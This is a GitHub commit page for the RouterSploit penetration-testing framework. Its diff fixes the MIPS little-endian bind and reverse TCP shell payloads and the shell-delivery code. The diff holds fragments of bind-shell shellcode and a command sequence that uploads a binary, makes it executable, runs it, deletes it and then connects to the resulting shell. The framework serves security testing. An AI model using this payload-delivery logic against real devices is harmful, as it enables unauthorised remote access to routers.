Payloads fixes (#337)

* Fixing payloads * Pep fixes

Payloads fixes (#337)
* Fixing payloads * Pep fixes
df6e1b66 · Marcin Bury · GitHub · 86b8c55e · df6e1b66 · df6e1b66
Commit df6e1b66 authored 7 years ago by Marcin Bury Committed by GitHub 7 years ago
Showing with 17 additions and 10 deletions

bind_tcp.py routersploit/modules/payloads/mipsle/bind_tcp.py +2 -2

reverse_tcp.py routersploit/modules/payloads/mipsle/reverse_tcp.py +1 -1

shell.py routersploit/shell.py +14 -7

No files found.
--- a/routersploit/modules/payloads/mipsle/bind_tcp.py
+++ b/routersploit/modules/payloads/mipsle/bind_tcp.py
@@ -18,10 +18,10 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
        ],
    }

-    architecture = Architectures.MIPSBE
+    architecture = Architectures.MIPSLE

    def generate(self):
-        bind_port = validators.convert_port(self.lport)
+        bind_port = validators.convert_port(self.rport)
        return (
            "\xe0\xff\xbd\x27" +  # addiu   sp,sp,-32
            "\xfd\xff\x0e\x24" +  # li      t6,-3

--- a/routersploit/modules/payloads/mipsle/reverse_tcp.py
+++ b/routersploit/modules/payloads/mipsle/reverse_tcp.py
@@ -18,7 +18,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
        ],
    }

-    architecture = Architectures.MIPSBE
+    architecture = Architectures.MIPSLE

    def generate(self):
        reverse_ip = validators.convert_ip(self.lhost)

--- a/routersploit/shell.py
+++ b/routersploit/shell.py
@@ -283,16 +283,19 @@ class Communication(object):
                if isinstance(item_exec_binary, str):
                    try:
                        commands.append(item_exec_binary.format(path))
-                    except ValueError:
+                    except (KeyError, ValueError):
                        commands.append(item_exec_binary)
                elif callable(item_exec_binary):
                    commands.append(item_exec_binary(path))

        # instruction to execute generic payload e.g. netcat / awk
        elif isinstance(self.exec_binary, str):
-            commands.append(self.exec_binary)
+            try:
+                commands.append(self.exec_binary.format(path))
+            except (KeyError, ValueError):
+                commands.append(self.exec_binary)

-        # default way of exectuign payload
+        # default way of executing payload
        else:
            exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path)
            commands.append(exec_binary_str)
@@ -314,7 +317,7 @@ class Communication(object):
        for command in commands[:-1]:
            self.exploit.execute(command)

-        # asynchronous last command to execute binary
+        # asynchronous last command to execute binary & rm binary
        thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
        thread.start()

@@ -333,9 +336,13 @@ class Communication(object):
        # execute binary
        commands = self.build_commands()

-        for command in commands:
-            thread = threading.Thread(target=self.exploit.execute, args=(command,))
-            thread.start()
+        # synchronized commands
+        for command in commands[:-1]:
+            self.exploit.execute(command)
+
+        # asynchronous last command to execute binary & rm binary
+        thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
+        thread.start()

        # connecting to shell
        print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))